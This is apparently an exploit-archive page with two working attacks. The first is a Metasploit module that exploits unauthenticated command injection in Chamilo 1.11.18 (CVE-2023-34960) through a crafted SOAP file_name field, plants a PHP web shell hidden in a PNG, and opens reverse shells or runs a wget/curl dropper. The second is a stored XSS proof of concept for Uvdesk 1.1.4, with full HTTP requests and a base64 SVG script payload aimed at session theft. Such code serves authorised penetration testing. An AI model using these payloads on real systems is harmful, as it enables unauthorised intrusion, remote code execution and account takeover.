<pre><code># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Format::PhpPayloadPng<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Chamilo unauthenticated command injection in PowerPoint upload',<br /> 'Description' => %q{<br /> Chamilo is an e-learning platform, also called Learning Management Systems (LMS).<br /> This module exploits an unauthenticated remote command execution vulnerability<br /> that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).<br /> Due to a functionality called Chamilo Rapid to easily convert PowerPoint<br /> slides to courses on Chamilo, it is possible for an unauthenticated remote<br /> attacker to execute arbitrary commands at OS level using a malicious SOAP<br /> request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.<br /> },<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Module Author<br /> 'Randorisec' # Original research<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-34960'],<br /> ['URL', 'https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities'],<br /> ['URL', 'https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['php', 'unix', 'linux'],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],<br /> 'Type' => :linux_dropper,<br /> 'Linemax' => 65535,<br /> 'CmdStagerFlavor' => ['wget', 'curl'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-06-01',<br /> 'DefaultOptions' => {<br /> 'SSL' => false,<br /> 'RPORT' => 80<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The Chamilo endpoint URL', '/' ]),<br /> OptString.new('WEBSHELL', [<br /> false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil<br /> ], conditions: %w[TARGET == 0])<br /> ])<br /> end<br /><br /> def soap_request(cmd)<br /> # create SOAP request exploiting CVE-2023-34960<br /><br /> # Randomize ppt size<br /> ppt_size = "#{rand(720..1440)}x#{rand(360..720)}"<br /><br /> return <<~EOS<br /> <?xml version="1.0" encoding="UTF-8"?><br /> <SOAP-ENV:Envelope<br /> xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"<br /> xmlns:ns1="#{target_uri.path}"<br /> xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"<br /> xmlns:xsd="http://www.w3.org/2001/XMLSchema"<br /> xmlns:ns2="http://xml.apache.org/xml-soap"<br /> xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"<br /> SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><br /> <SOAP-ENV:Body><br /> <ns1:wsConvertPpt><br /> <param0 xsi:type="ns2:Map"><br /> <item><br /> <key xsi:type="xsd:string">file_data</key><br /> <value xsi:type="xsd:string"></value><br /> </item><br /> <item><br /> <key xsi:type="xsd:string">file_name</key><br /> <value xsi:type="xsd:string">`{{}}`.pptx'|" |#{cmd}||a #</value><br /> </item><br /> <item><br /> <key xsi:type="xsd:string">service_ppt2lp_size</key><br /> <value xsi:type="xsd:string">#{ppt_size}</value><br /> </item><br /> </param0><br /> </ns1:wsConvertPpt><br /> </SOAP-ENV:Body><br /> </SOAP-ENV:Envelope><br /> EOS<br /> end<br /><br /> def upload_webshell<br /> # randomize file name if option WEBSHELL is not set<br /> @webshell_name = if datastore['WEBSHELL'].blank?<br /> "#{Rex::Text.rand_text_alpha(8..16)}.php"<br /> else<br /> datastore['WEBSHELL'].to_s<br /> end<br /><br /> @post_param = Rex::Text.rand_text_alphanumeric(1..8)<br /><br /> # inject PHP payload into the PLTE chunk of a PNG image to hide the payload<br /> php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"<br /> png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')<br /> return nil if png_webshell.nil?<br /><br /> # encode webshell data and write to file on the target for execution<br /> payload = Base64.strict_encode64(png_webshell.to_s)<br /> cmd = "echo #{payload}|openssl enc -a -d > ./#{@webshell_name}"<br /><br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),<br /> 'ctype' => 'text/xml; charset=utf-8',<br /> 'data' => soap_request(cmd).to_s<br /> })<br /> end<br /><br /> def execute_php(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'main', 'inc', 'lib', 'ppt2png', @webshell_name),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> @post_param => payload<br /> }<br /> })<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Encode payload with base64 and decode with openssl (most common installed on unix systems)<br /> payload = Base64.strict_encode64(cmd)<br /> cmd = "echo #{payload}|openssl enc -a -d|sh"<br /><br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),<br /> 'ctype' => 'text/xml; charset=utf-8',<br /> 'data' => soap_request(cmd).to_s<br /> })<br /> end<br /><br /> def check<br /> # Checking if the target is vulnerable by echoing a randomised marker that will return the marker in the response.<br /> print_status("Checking if #{peer} can be exploited.")<br /> marker = Rex::Text.rand_text_alphanumeric(8..16)<br /> res = execute_command("echo #{marker}")<br /> if res && res.code == 200 && res.body.include?('wsConvertPptResponse') && res.body.include?(marker)<br /> CheckCode::Vulnerable<br /> else<br /> CheckCode::Safe('No valid response received from the target.')<br /> end<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :php<br /> res = upload_webshell<br /> fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse')<br /> register_file_for_cleanup(@webshell_name.to_s)<br /> execute_php(payload.encoded)<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager({ linemax: target.opts['Linemax'] })<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)<br /># Date: 14/08/2023<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://www.uvdesk.com/<br /># Software Link: https://github.com/MegaTKC/AeroCMS<br /># Version: 1.1.4<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br /># Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.<br /><br />## Example XSS Stored in new ticket<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Param: reply<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 812<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://127.0.0.1<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3<br />Connection: close<br /><br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="threadType"<br /><br />forward<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="status"<br /><br /><br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="subject"<br /><br />aaaa<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="to[]"<br /><br />test@local.host<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="reply"<br /><br />%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="pic"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="nextView"<br /><br />stay<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk--<br /><br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 302 Found<br />Date: Mon, 14 Aug 2023 11:33:26 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: PHP/7.4.29<br />Cache-Control: max-age=0, must-revalidate, private<br />Location: /uvdesk/public/en/member/ticket/view/1<br />Access-Control-Allow-Origin: *<br />Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS<br />Access-Control-Allow-Headers: Access-Control-Allow-Origin<br />Access-Control-Allow-Headers: Authorization<br />Access-Control-Allow-Headers: Content-Type<br />X-Debug-Token: bf1b73<br />X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73<br />X-Robots-Tag: noindex<br />Expires: Mon, 14 Aug 2023 11:33:26 GMT<br />Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 398<br /><br /><!DOCTYPE html><br /><html><br /> <head><br /> <meta charset="UTF-8" /><br /> <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" /><br /><br /> <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title><br /> </head><br /> <body><br /> Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.<br /> </body><br /></html><br />-----------------------------------------------------------------------------------------------------------------------<br />Redirect and view response:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Mon, 14 Aug 2023 11:44:14 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: PHP/7.4.29<br />Cache-Control: max-age=0, must-revalidate, private<br />Access-Control-Allow-Origin: *<br />Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS<br />Access-Control-Allow-Headers: Access-Control-Allow-Origin<br />Access-Control-Allow-Headers: Authorization<br />Access-Control-Allow-Headers: Content-Type<br />X-Debug-Token: 254ce8<br />X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8<br />X-Robots-Tag: noindex<br />Expires: Mon, 14 Aug 2023 11:44:14 GMT<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 300607<br /><br /><!DOCTYPE html><br /><html><br /> <head><br /> <title>#1 vvvvvvvvvvvvvvvvvvvvv</title><br />[...]<br /><p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p><br />[...]<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.<br /> <br /><br /><br /></code></pre>
